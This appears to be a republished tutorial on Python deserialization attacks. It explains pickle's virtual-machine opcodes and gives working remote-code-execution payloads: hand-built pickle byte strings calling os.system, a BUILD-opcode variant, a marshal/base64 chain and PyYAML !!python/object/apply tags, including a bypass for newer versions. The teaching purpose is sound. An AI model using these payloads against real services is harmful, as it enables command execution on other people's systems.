2025-01-16 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
This article presents a sample analysis of Python deserialization, offered as a practical reference.
Python deserialization vulnerabilities
Pickle
Serialization: pickle.dumps() serializes an object into a byte string (bytes in Python 3), and pickle.dump() writes the serialized data to a file
Deserialization: pickle.loads() deserializes a byte string into an object, and pickle.load() reads the data from a file and deserializes it
When calling dump() and dumps(), the protocol parameter selects the protocol version; load() and loads() detect the version from the data
There are six protocol versions: 0, 1, 2, 3, 4, and 5. Different Python versions use different default protocols. Version 0 is the most human-readable; later versions add unprintable characters for optimization.
Unpickling is backward compatible: newer Python versions can still read older protocols, so version 0 data can be loaded directly.
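As a small illustration of the protocol parameter, the sketch below pickles the same object with protocol 0 and protocol 4 and loads both back. The sample dictionary is made up for the example.

```python
import pickle

data = {"name": "demo", "values": [1, 2, 3]}

# Protocol 0 is mostly printable ASCII; higher protocols are binary.
as_proto0 = pickle.dumps(data, protocol=0)
as_proto4 = pickle.dumps(data, protocol=4)
print(as_proto0)
print(as_proto4)

# loads() takes no protocol argument: it detects the version from the data.
assert pickle.loads(as_proto0) == data
assert pickle.loads(as_proto4) == data

# The defaults depend on the Python version in use.
print(pickle.DEFAULT_PROTOCOL, pickle.HIGHEST_PROTOCOL)
```

Binary protocols (2 and later) start with the PROTO opcode b'\x80' followed by the version byte, which is how the two outputs can be told apart at a glance.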
Serializable objects
None, True, and False
Integers, floating-point numbers, and complex numbers
str, bytes, and bytearray
Collections that contain only picklable objects, including tuple, list, set, and dict
Functions defined at the top level of a module (using def, not lambda)
Built-in functions defined at the top level of a module
Classes defined at the top level of a module
Instances of classes whose __dict__, or the return value of __getstate__(), is picklable (see "Pickling Class Instances" in the official documentation for details)
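The list above can be checked quickly with a helper like the following. This is only a sketch: can_pickle is a hypothetical helper name, and the sample values are chosen for illustration.

```python
import collections
import pickle

def can_pickle(obj):
    """Return True if pickle.dumps() accepts obj, False if it refuses."""
    try:
        pickle.dumps(obj)
        return True
    except (pickle.PicklingError, AttributeError, TypeError):
        return False

# A container holding only picklable values
print(can_pickle([None, True, 1, 2.5, 3 + 4j, "s", b"b"]))
# A built-in function
print(can_pickle(len))
# A class defined at the top level of a module
print(can_pickle(collections.OrderedDict))
# A lambda is pickled by name, and the name '<lambda>' cannot be looked up
print(can_pickle(lambda x: x))
```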
Deserialization process
pickle.load() and pickle.loads() are implemented on top of the _Unpickler class.
During deserialization, _Unpickler (hereinafter called the machine) maintains two things: the stack and the memo (storage area).
To study the process, use the pickletools module, which can disassemble pickled data.
[Figure: pickletools disassembly of a pickled list (image unavailable)]
As can be seen from the figure, the serialized data is actually a sequence of PVM (Pickle Virtual Machine) instructions, which the machine executes using a stack.
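A disassembly of this kind can be produced with a few lines. The sketch below assumes a three-element list as the sample object and captures the listing in a string so it can be inspected or printed.

```python
import io
import pickle
import pickletools

raw = pickle.dumps(["a", "b", "c"], protocol=3)
optimized = pickletools.optimize(raw)   # drops PUT opcodes that are never used

buffer = io.StringIO()
pickletools.dis(optimized, out=buffer)  # write the disassembly into the buffer
listing = buffer.getvalue()
print(listing)
```

Each row of the listing shows the byte offset, the one-byte opcode, its symbolic name, and any argument.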
PVM instruction set
The complete PVM instruction set can be viewed in pickletools.py. The instruction set used by different protocol versions varies slightly.
The disassembly in the figure above reads:
        0: \x80 PROTO      3                 # protocol version
        2: ]    EMPTY_LIST                   # push an empty list onto the stack
        3: (    MARK                         # push a mark onto the stack
        4: X        BINUNICODE 'a'           # push a unicode string
       10: X        BINUNICODE 'b'
       16: X        BINUNICODE 'c'
       22: e        APPENDS    (MARK at 3)   # append everything after the mark at 3 to the list
       23: .    STOP                         # pop the result off the stack and stop
    highest protocol among opcodes = 2
Several opcodes in the instruction set are especially important:
GLOBAL = b'c' # reads two newline-terminated strings, the module name and then the class (attribute) name, and pushes module.name onto the stack; in other words, the value of any global xxx.xxx can be fetched
REDUCE = b'R' # pops an argument tuple and a callable, calls the callable with those arguments, and pushes the result; the callable and the arguments are the first and second values returned by __reduce__()
BUILD = b'b' # finishes building an object through __setstate__ or by updating __dict__. If the object has a __setstate__ method, obj.__setstate__(state) is called; otherwise obj.__dict__.update(state) is used (the update can overwrite existing attributes)
STOP = b'.' # end of the pickle
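To see GLOBAL, REDUCE, and STOP working together, a pickle can be written by hand. The sketch below uses builtins.len as a harmless stand-in for a dangerous function; the payload is an illustration, not something taken from the article.

```python
import pickle

# Hand-written protocol 0 opcodes, one step per line:
payload = (
    b"cbuiltins\nlen\n"   # GLOBAL: push builtins.len
    b"(S'whoami'\n"       # MARK, then STRING: push 'whoami'
    b"t"                  # TUPLE: collect everything after the mark into ('whoami',)
    b"R"                  # REDUCE: call len('whoami') and push the result
    b"."                  # STOP: return the top of the stack
)

result = pickle.loads(payload)
print(result)
```

No class and no __reduce__ method is involved here: the call happens purely because the byte stream contains the R opcode.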
A more complex example:
    import pickle
    import pickletools

    class a_class():
        def __init__(self):
            self.age = 24
            self.status = 'student'
            self.list = ['a', 'b', 'c']

    a_class_new = a_class()
    a_class_pickle = pickle.dumps(a_class_new, protocol=3)
    print(a_class_pickle)
    # optimize the pickled bytes
    a_class_pickle = pickletools.optimize(a_class_pickle)
    print(a_class_pickle)
    # disassemble the pickled bytes
    pickletools.dis(a_class_pickle)

        0: \x80 PROTO      3
        2: c    GLOBAL     '__main__ a_class'
       20: )    EMPTY_TUPLE                  # push an empty tuple
       21: \x81 NEWOBJ                       # the stack holds a class (__main__.a_class) and a tuple (pushed at offset 20); call cls.__new__(cls, *args) to create an instance (the tuple is empty here)
       22: }    EMPTY_DICT                   # push an empty dict
       23: (    MARK
       24: X        BINUNICODE 'age'
       32: K        BININT1    24
       34: X        BINUNICODE 'status'
       45: X        BINUNICODE 'student'
       57: X        BINUNICODE 'list'
       66: ]        EMPTY_LIST
       67: (        MARK
       68: X            BINUNICODE 'a'
       74: X            BINUNICODE 'b'
       80: X            BINUNICODE 'c'
       86: e            APPENDS    (MARK at 67)
       87: u        SETITEMS   (MARK at 23)  # add the values pushed since offset 23 to the dict as key-value pairs
       88: b    BUILD                        # update the instance with the dict to finish building it
       89: .    STOP
    highest protocol among opcodes = 2
Common function execution
Three PVM opcodes can execute a function: R, i, and o, so a payload can be built in three ways:
R:
    b"cos\nsystem\n(S'whoami'\ntR."
i:
    b"(S'whoami'\nios\nsystem\n."
o:
    b"(cos\nsystem\nS'whoami'\no."
Command execution (__reduce__())
The __reduce__() magic method is called when an object is pickled and returns a tuple. The first element is a callable that is invoked to create the initial version of the object when it is unpickled, and the second element is a tuple of arguments for that callable. Because the callable runs during deserialization, this can lead to RCE vulnerabilities.
The opcode that triggers the call is R. As long as the serialized data contains an R instruction, the callable is executed, regardless of whether a __reduce__ method is defined in the target program.
When deserializing, pickle automatically imports modules that have not been imported yet, so every code-execution and command-execution function in the Python standard library is available. The payload should preferably be generated with the same Python version as the target.
Example:
    import os

    class a_class():
        def __reduce__(self):
            return os.system, ('whoami',)

    # Return value of the __reduce__() magic method: os.system, ('whoami',)
    # 1. It is a tuple with at least two elements
    # 2. The first element is the callable: os.system
    # 3. The second element is a tuple, ('whoami',), holding the arguments for the callable
    # 4. So the call made during deserialization is os.system('whoami')

Pickled with protocol 3 (the GLOBAL 'nt system' shows this was generated on Windows), the raw bytes, the optimized bytes, and their disassembly are:
    b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'
    b'\x80\x03cnt\nsystem\nX\x06\x00\x00\x00whoami\x85R.'
        0: \x80 PROTO      3
        2: c    GLOBAL     'nt system'
       13: X    BINUNICODE 'whoami'
       24: \x85 TUPLE1
       25: R    REDUCE
       26: .    STOP
    highest protocol among opcodes = 2
When these bytes are deserialized, os.system('whoami') is executed.
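The same mechanism can be observed safely by returning a harmless callable. In the sketch below, the class name Harmless and the use of len in place of os.system are assumptions made for the demonstration.

```python
import pickle

class Harmless:
    # Called while pickling: the returned (callable, args) pair is what
    # ends up in the byte stream, not the Harmless instance itself.
    def __reduce__(self):
        return len, ("whoami",)

data = pickle.dumps(Harmless(), protocol=3)
print(data)

# Unpickling runs len('whoami') through the R opcode and returns its result.
result = pickle.loads(data)
print(type(result), result)
```

The pickled bytes never mention the Harmless class, so the receiving side does not need the class definition for the call to happen.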
Global variable overwriting
__reduce__() relies on the R opcode to achieve RCE, while the GLOBAL = b'c' opcode can be used to read and overwrite global variables
    # secret.py
    a = 'aaaaaa'

    # unser.py
    import secret
    import pickle

    class flag():
        def __init__(self, a):
            self.a = a

    your_payload = b'?'
    other_flag = pickle.loads(your_payload)
    secret_flag = flag(secret.a)
    if other_flag.a == secret_flag.a:
        print('flag: {}'.format(secret_flag.a))
    else:
        print('Notification')
How can the check be passed without knowing the value of secret.a?
First, get the serialized bytes of a Flag instance:
    class Flag():
        def __init__(self, a):
            self.a = a

    new_flag = pickle.dumps(Flag("A"), protocol=3)
    flag = pickletools.optimize(new_flag)
    print(flag)
    pickletools.dis(new_flag)

    b'\x80\x03c__main__\nFlag\n)\x81}X\x01\x00\x00\x00aX\x01\x00\x00\x00Asb.'
        0: \x80 PROTO      3
        2: c    GLOBAL     '__main__ Flag'
       17: q    BINPUT     0
       19: )    EMPTY_TUPLE
       20: \x81 NEWOBJ
       21: q    BINPUT     1
       23: }    EMPTY_DICT
       24: q    BINPUT     2
       26: X    BINUNICODE 'a'
       32: q    BINPUT     3
       34: X    BINUNICODE 'A'
       40: q    BINPUT     4
       42: s    SETITEM
       43: b    BUILD
       44: .    STOP
    highest protocol among opcodes = 2
As you can see, the value is pushed at offset 34, where the string 'A' is assigned to the attribute a. To use the global variable secret.a instead, change X BINUNICODE 'A' to c GLOBAL 'secret a' (that is, replace X\x01\x00\x00\x00A with csecret\na\n). After these bytes are deserialized, self.a equals secret.a and the flag is obtained.
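The substitution can be tried end to end without separate files. In this sketch a throwaway module named secret_demo (a hypothetical name) stands in for secret.py and also hosts the Flag class, so that the GLOBAL opcode can import both by name.

```python
import pickle
import sys
import types

# Stand-in for secret.py, registered so that GLOBAL can import it by name.
demo = types.ModuleType("secret_demo")
demo.a = "aaaaaa"

class Flag:
    def __init__(self, a):
        self.a = a

demo.Flag = Flag
sys.modules["secret_demo"] = demo

payload = (
    b"\x80\x03"                 # PROTO 3
    b"csecret_demo\nFlag\n"     # GLOBAL: push the Flag class
    b")\x81"                    # EMPTY_TUPLE, NEWOBJ: Flag.__new__(Flag)
    b"}"                        # EMPTY_DICT: the state dictionary
    b"X\x01\x00\x00\x00a"       # BINUNICODE 'a': the key
    b"csecret_demo\na\n"        # GLOBAL in place of BINUNICODE 'A': push secret_demo.a
    b"s"                        # SETITEM: state['a'] = secret_demo.a
    b"b."                       # BUILD, then STOP
)

other_flag = pickle.loads(payload)
print(other_flag.a == demo.a)
```

The attacker never has to know the secret value: the payload only names where it lives, and the unpickler fetches it.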
Besides rewriting the PVM instructions, the exec function can also be used to overwrite variables:
    test1 = 'test1'
    test2 = 'test2'

    class A:
        def __reduce__(self):
            return exec, ("test1='asd'\ntest2='qwe'",)
Using the BUILD instruction for RCE (without the R instruction)
By combining the BUILD and GLOBAL instructions, a method of an existing class instance can be replaced with os.system or another function.
Suppose a class has no __setstate__ method. We can then BUILD an instance of it with the state {'__setstate__': os.system}.
When this BUILD instruction executes, the object has no __setstate__ method, so the __dict__ update runs and the object's __setstate__ attribute becomes the os.system we specified.
If we then BUILD the object again with 'whoami', __setstate__('whoami') is called. Since __setstate__ is now os.system, this achieves RCE.
Example:
Suppose the code contains an arbitrary class:
    class payload:
        def __init__(self):
            pass
Construct PVM instructions from this class:
        0: \x80 PROTO      3
        2: c    GLOBAL     '__main__ payload'
       17: q    BINPUT     0
       19: )    EMPTY_TUPLE
       20: \x81 NEWOBJ
       21: }    EMPTY_DICT                  # BUILD needs a dict, so push one first
       22: (    MARK                        # push a mark
       23: V    UNICODE    '__setstate__'   # push the key, then the value
       37: c    GLOBAL     'nt system'
       48: u    SETITEMS   (MARK at 22)
       49: b    BUILD                       # first BUILD
       50: V    UNICODE    'whoami'         # push the argument
       58: b    BUILD                       # second BUILD
       59: .    STOP
Written as bytes, the instructions above are b'\x80\x03c__main__\npayload\n)\x81}(V__setstate__\ncnt\nsystem\nubVwhoami\nb.'. Deserializing them with pickle.loads() executes the command.
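The double BUILD trick can be reproduced without running a shell command. The sketch below swaps os.system for a hypothetical record function that only remembers its argument, and registers a throwaway module named build_demo (also an assumption) so the GLOBAL opcode can find the class and the function.

```python
import pickle
import sys
import types

calls = []

def record(arg):
    """Harmless stand-in for os.system: remember what it was called with."""
    calls.append(arg)

class Payload:
    pass

demo = types.ModuleType("build_demo")
demo.Payload = Payload
demo.record = record
sys.modules["build_demo"] = demo

payload = (
    b"\x80\x03"
    b"cbuild_demo\nPayload\n)\x81"  # GLOBAL, EMPTY_TUPLE, NEWOBJ: create an instance
    b"}(V__setstate__\n"            # EMPTY_DICT, MARK, key '__setstate__'
    b"cbuild_demo\nrecord\n"        # value: the record function
    b"u"                            # SETITEMS: {'__setstate__': record}
    b"b"                            # first BUILD: no __setstate__ yet, so __dict__ is updated
    b"Vwhoami\n"                    # argument for the second BUILD
    b"b"                            # second BUILD: calls obj.__setstate__('whoami')
    b"."                            # STOP
)

obj = pickle.loads(payload)
print(calls)
```

Note that the byte stream contains no R, i, or o opcode, so a filter that only looks for those would not catch it.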
Using the marshal module for arbitrary function execution
pickle cannot serialize code objects, but Python provides the marshal module, which can.
A serialized code object cannot simply be invoked through __reduce__(), however, because __reduce__ works by calling a callable and passing it arguments. Our function is itself the callable, and we need to execute it rather than pass it as an argument to another function. This requires the types module to dynamically create an anonymous function.
    import base64
    import marshal
    import types

    def code():
        import os
        print('hello')
        os.system('whoami')

    code_pickle = base64.b64encode(marshal.dumps(code.__code__))  # in Python 2 this is code.func_code
    # dynamically create an anonymous function with types and execute it
    types.FunctionType(marshal.loads(base64.b64decode(code_pickle)), globals(), '')()
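The difference between the two modules is easy to confirm with a function that has no side effects. In this sketch, greet and the name 'rebuilt' are placeholders chosen for the example.

```python
import marshal
import pickle
import types

def greet():
    return "hello"

# pickle refuses code objects...
try:
    pickle.dumps(greet.__code__)
    pickled_ok = True
except (TypeError, pickle.PicklingError):
    pickled_ok = False
print(pickled_ok)

# ...while marshal round-trips them, and types.FunctionType turns the
# restored code object back into something callable.
blob = marshal.dumps(greet.__code__)
rebuilt = types.FunctionType(marshal.loads(blob), globals(), "rebuilt")
print(rebuilt())
```

The marshal format is specific to the Python version that produced it, which is one more reason a payload has to be generated with an interpreter matching the target.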
Using it with pickle:
    import pickle

    # types.FunctionType(marshal.loads(base64.b64decode(code_pickle)), globals(), '')() rewritten as PVM instructions
    s = (
        b"ctypes\nFunctionType\n"
        b"(cmarshal\nloads\n"
        b"(cbase64\nb64decode\n"
        b"(S'4wAAAAAAAAAAAAAAAAEAAAADAAAAQwAAAHMeAAAAZAFkAGwAfQB0AWQCgwEBAHwAoAJkA6EBAQBkAFMAKQRO6QAAAADaBWhlbGxv2gZ3aG9hbWkpA9oCb3PaBXByaW502gZzeXN0ZW0pAXIEAAAAqQByBwAAAPogRDovUHl0aG9uL1Byb2plY3QvdW5zZXJpYWxpemUucHnaBGNvZGUlAAAAcwYAAAAAAQgBCAE='\n"
        b"tRtRc__builtin__\nglobals\n"
        b"(tRS''\ntR(tR."
    )
    pickle.loads(s)  # the payload must be bytes, not str
Vulnerability locations
When authentication tokens and sessions are parsed
When pickled objects are stored in a file on disk
When pickled objects are transferred over the network
When they are passed to the program as parameters
PyYAML
YAML is a data serialization format similar to XML and JSON. Every language that supports YAML has its own implementation for parsing (reading and saving) it; PyYAML is the Python implementation.
When using the PyYAML library, parsing YAML with yaml.load() instead of yaml.safe_load() can lead to deserialization vulnerabilities.
Principle
PyYAML has a set of constructor functions for Python-specific tags, three of which are object-related:
!!python/object: => Constructor.construct_python_object
For example:
    # Test.py
    import yaml
    import os

    class test:
        def __init__(self):
            os.system('whoami')

    payload = yaml.dump(test())
    fp = open('sample.yml', 'w')
    fp.write(payload)
    fp.close()
After the code runs, sample.yml is created with the content !!python/object:__main__.test {}
Change the contents of the file to !!python/object:Test.test {} and then parse it with yaml.load():
    import yaml
    yaml.load(open('sample.yml', 'r'))
The command executes successfully. However, execution depends on Test.py being present, because yaml.load() looks up the test class in Test.py as directed by the yml file. If Test.py is deleted, the load fails.
Payload
PyYAML < 5.1
To execute commands without that dependency, replace the class or function with one from the Python standard library and use the other two Python tags:
    # This tag lets PyYAML create Python objects dynamically while parsing YAML data
    !!python/object/apply: => Constructor.construct_python_object_apply
    # This tag calls construct_python_object_apply
    !!python/object/new: => Constructor.construct_python_object_new
With these two tags, you can construct any payload:
    !!python/object/apply:subprocess.check_output [[calc.exe]]
    !!python/object/apply:subprocess.check_output ["calc.exe"]
    !!python/object/apply:subprocess.check_output [["calc.exe"]]
    !!python/object/apply:os.system ["calc.exe"]
    !!python/object/new:subprocess.check_output [["calc.exe"]]
    !!python/object/new:os.system ["calc.exe"]
PyYAML >= 5.1
From PyYAML 5.1 on, deserializing built-in class methods and importing modules that are not already loaded are restricted, and load() expects a Loader argument; calling it without one produces a security warning.
There are four loaders:
BaseLoader: loads only the most basic YAML
SafeLoader: safely loads a subset of the YAML language, recommended for untrusted input (safe_load)
FullLoader: loads the full YAML language while trying to avoid arbitrary code execution. It is the default loader used by yaml.load(input) in PyYAML 5.1, after the warning is issued (full_load)
UnsafeLoader (also called Loader, for backward compatibility): the original Loader code, which can be easily exploited with untrusted input (unsafe_load)
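The effect of choosing SafeLoader can be checked with a short script. This is a sketch that assumes PyYAML is installed (it reports that and skips the check otherwise); classify is a hypothetical helper, and the document string is a harmless variant of the payloads above.

```python
try:
    import yaml  # PyYAML, a third-party package
except ImportError:
    yaml = None

document = "!!python/object/apply:os.system ['echo hi']"

def classify(text):
    """Report how yaml.safe_load() treats the given document."""
    if yaml is None:
        return "PyYAML not installed"
    try:
        yaml.safe_load(text)
        return "loaded"
    except yaml.YAMLError:
        return "rejected"

outcome = classify(document)
print(outcome)                 # the python/object/apply tag
print(classify("a: 1"))        # plain data
```

safe_load() has no constructor for the python/object/apply tag, so the document is refused before any function can be called, while ordinary mappings and lists load as usual.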
On these newer versions the earlier payloads no longer work, but the subprocess.getoutput() method can be used to bypass the check:
    !!python/object/apply:subprocess.getoutput
    - whoami
On the latest version at the time of writing, the command executes successfully.
ruamel.yaml
ruamel.yaml is used in basically the same way as PyYAML, and it supports the newer YAML 1.2 by default.
To deserialize a serialized class method with parameters in ruamel.yaml, the following calls are available:
    load(data)
    load(data, Loader=Loader)
    load(data, Loader=UnsafeLoader)
    load(data, Loader=FullLoader)
    load_all(data)
    load_all(data, Loader=Loader)
    load_all(data, Loader=UnsafeLoader)
    load_all(data, Loader=FullLoader)
Any of these calls works. Even calling load() directly with only the data deserializes it, and our class methods are executed.